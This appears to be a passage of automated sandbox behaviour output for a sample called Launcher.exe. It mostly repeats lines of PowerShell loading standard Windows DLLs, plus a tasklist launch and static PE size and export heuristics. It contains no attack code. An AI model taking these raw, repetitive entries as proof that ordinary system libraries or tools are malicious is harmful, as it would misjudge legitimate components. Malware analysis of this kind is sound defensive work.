        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\tasklist.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: Launcher.exeStatic PE information: More than 8191 > 100 exports found
        Source: Launcher.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
        Source: Launcher.exeStatic PE information: Image base 0x140000000 > 0x60000000
        Source: Launcher.exeStatic file information: File size 59619367 > 1048576
        Source: Launcher.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x12aa000
        Source: Launcher.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0xfe5c00
        Source: Launcher.exeStatic PE information: More than 200 imports for KERNEL32.dll
        Source: Launcher.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: Launcher.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: Launcher.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: Launcher.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Launcher.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
